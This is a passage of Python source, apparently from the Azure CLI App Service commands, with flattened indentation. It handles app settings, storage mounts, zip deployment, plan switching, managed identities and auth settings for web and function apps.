vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(subscription_id,
subnet_rg,
vnet)
subnet_id_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}/subnets/{}"
subnet_rid = subnet_id_fmt.format(subscription_id, subnet_rg, vnet_name, subnet_name)
subnet_info["vnet_name"] = vnet_name
subnet_info["subnet_name"] = subnet_name
subnet_info["resource_group_name"] = subnet_rg
subnet_info["subnet_resource_id"] = subnet_rid
subnet_info["subnet_subscription_id"] = subscription_id
return subnet_info
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1  # you can only specify one of the combinations
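# Illustrative behaviour of the validator above (not part of the original module):
# exactly one of runtime / container image / multicontainer config may be given,
# and the multicontainer type and file must be supplied together.
#   validate_container_app_create_options(runtime="NODE|14-lts")                       -> True
#   validate_container_app_create_options(runtime="NODE|14-lts",
#                                         deployment_container_image_name="nginx")     -> False
#   validate_container_app_create_options(multicontainer_config_type="COMPOSE",
#                                         multicontainer_config_file="docker-compose.yml") -> True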
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
non_url = "/" not in deployment_container_image_name
non_url = non_url or ("." not in deployment_container_image_name and ":" not in deployment_container_image_name)
if non_url:
return None
parsed_url = urlparse(deployment_container_image_name)
if parsed_url.scheme:
return parsed_url.hostname
hostname = urlparse("https://{}".format(deployment_container_image_name)).hostname
return "https://{}".format(hostname)
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like to accept the output of the "list" command
for t in temp:
if 'slotSetting' in t.keys():
slot_result[t['name']] = t['slotSetting']
if setting_type == "SlotSettings":
slot_result[t['name']] = True
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(dest)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
# Slot settings logic to add a new setting(s) or remove an existing setting(s)
for slot_setting_name, value in slot_result.items():
if value and slot_setting_name not in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.append(slot_setting_name)
elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(slot_setting_name)
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because, when the plan is created as part of the function app,
# it can take a few attempts before it becomes available
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote and app.reserved:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
elif app.reserved:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed. Use 'az webapp config appsettings list --name MyWebapp --resource-group "
"MyResourceGroup --subscription MySubscription' to list app settings and 'az webapp "
"config appsettings delete --name MyWebApp --resource-group MyResourceGroup "
"--setting-names <setting-names> to delete them.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find an \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current / float(total)))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.utcnow()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code != 200:
raise ex
def show_webapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, "webapp", slot)
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, # pylint: disable=unused-argument
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): # pylint: disable=unused-argument
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)
def get_functionapp(cmd, resource_group_name, name, slot=None):
function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not function_app or 'function' not in function_app.kind:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return function_app
def show_functionapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, 'functionapp', slot)
def list_webapp(cmd, resource_group_name=None):
full_list = _list_app(cmd.cli_ctx, resource_group_name)
# ignore apps with kind==null and function apps
return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list))
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
slot, request)
def list_function_app(cmd, resource_group_name=None):
return list(filter(lambda x: x.kind is not None and "function" in x.kind.lower(),
_list_app(cmd.cli_ctx, resource_group_name)))
def _show_app(cmd, resource_group_name, name, cmd_app_type, slot=None):
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not app:
raise ResourceNotFoundError("Unable to find {} '{}', in RG '{}'.".format(
cmd_app_type, name, resource_group_name))
app_type = _kind_to_app_type(app.kind) if app else None
if app_type != cmd_app_type:
raise ResourceNotFoundError(
"Unable to find {app_type} '{name}', in resource group '{resource_group}'".format(
app_type=cmd_app_type, name=name, resource_group=resource_group_name),
"Use 'az {app_type} show' to show {app_type}s".format(app_type=app_type))
app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
_rename_server_farm_props(app)
_fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot)
return app
def _kind_to_app_type(kind):
if "workflow" in kind:
return "logicapp"
if "function" in kind:
return "functionapp"
return "webapp"
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = []
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
extra_parameter=webapp, slot=slot)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not web_app:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return web_app.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
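# Illustrative behaviour (not part of the original module): a valid auth runtime
# version is either "~<int>" or three dot-separated integers.
#   is_auth_runtime_version_valid("~2")      -> True
#   is_auth_runtime_version_valid("1.4.0")   -> True
#   is_auth_runtime_version_valid("1.4")     -> False
#   is_auth_runtime_version_valid(None)      -> True (nothing to validate)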
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is already used in azure.cli.core.commands,
# and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot)
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None): # pylint: disable=unused-argument
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check whether app settings have been propagated to the Kudu site correctly by calling its /api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Returns True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
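# Illustrative call (hypothetical resource names and settings), based on the checks above:
#   validate_app_settings_in_scm(cmd, 'myRG', 'myapp',
#                                should_have=['WEBSITE_RUN_FROM_PACKAGE'],
#                                should_not_have=['DOCKER_CUSTOM_IMAGE_NAME'],
#                                should_contain={'FUNCTIONS_EXTENSION_VERSION': '~4'})
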